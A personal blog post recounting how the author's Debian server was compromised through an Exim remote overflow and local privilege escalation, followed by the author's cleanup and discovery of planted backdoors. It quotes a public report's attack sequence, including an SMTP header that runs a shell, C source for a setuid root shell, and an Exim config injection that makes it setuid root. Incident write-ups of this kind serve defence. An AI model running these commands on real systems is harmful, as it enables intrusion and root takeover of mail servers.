25.12.2010 18:00, pesco
As if to put me in the right mood for the upcoming
Chaos Communication Congress,
the server that hosted this domain was
externally realigned
a few days
ago. ;)
I hear the exploit has really been making the rounds
(it was
slashdotted, too).
And I can kinda tell why: It is a really gorgeous remote buffer overflow / local
priviledge escalation combo in Exim.
The Exim that was included as the default mail server on Debian stable until
a few days ago.
As to how it works,
quoting the
report
by someone named Sergey Kononenko:
Here I can put brief sequence of attack:
EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB...
...
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB...
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{...
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbo...
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbo...
...
about 700000 the same strings
...
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbo...
MAILbombMAILb
.
I'm not
entirely sure what's going on in that header there,
i.e. why that works,
but it's obviously a remote hole that gets you a shell on the host.
This would run as an unpriviledged user, but,
still quoting the same source:
after that attacker gets shell with id of user Debian-exim and cwd
in /var/spool/exim4
then it put file there file setuid with trivial execution of root shell:
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
Yeah, that would spawn a root shell, if it could.
E.g. if it was setuid root.
The free sudo, as I'd like to call it.
How do we get there? Check this out:
and create another file e.conf with following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}
the he runs:
exim -Ce.conf -q
Ahahahah! There we go, just tell Exim what we want, and it does it.
As root. Thanks!
…
So, I copied any important data off the system.
Then I ran
chkrootkit and
rkhunter.
Both emitted a bunch of bogus warnings and the latter didn't find anything.
However,
chkrootkit spotted a curious
bash process listening on a network port.
The process could actually be seen on
netstat.
I killed it. And Exim.
Also, I noticed
pstree showing two
named
processes.
Wait… I'm not running DNS here.
And were these in the
ps I did earlier?
Nope, omits them.
# grep named /etc/*
rc.local: /sbin/named # Starting named daemon
o.O
# cat /etc/rc.local
/sbin/named # Starting named daemon
/usr/sbin/sshd # Starting sshd daemon
/sbin/service iptables stop # Stopping firewall
Hm, I don't have
/sbin/service.
Looks like his kit was expecting Red Hat.
# strings /sbin/named
[...]
bash
Password:
Incorrect password.
.-= Backdoor made by Mironov =-.
.-= Running =-.
Aha. Some Google hits on this from years past.
shrug
# strings sshd | grep -C 3 backdoor
Could not chdir to home directory %s: %s
/dev/devno
xxxxx are %d entries in the log
xxxx xxxxx backdoor
Oupss
session_new: init
session_new: session %d
Eheheh, so that's why my
ssh session died.
# find / -user root -perm -4000 # setuid root
[...]
/sbin/shs
# strings /sbin/shs
[...]
[Welcome Morfeus]
/bin/sh
Yeah. So…
As luck would have it,
I was in the middle of migrating to a new machine anyway.
So I completed the move and shut the old system down.
:)
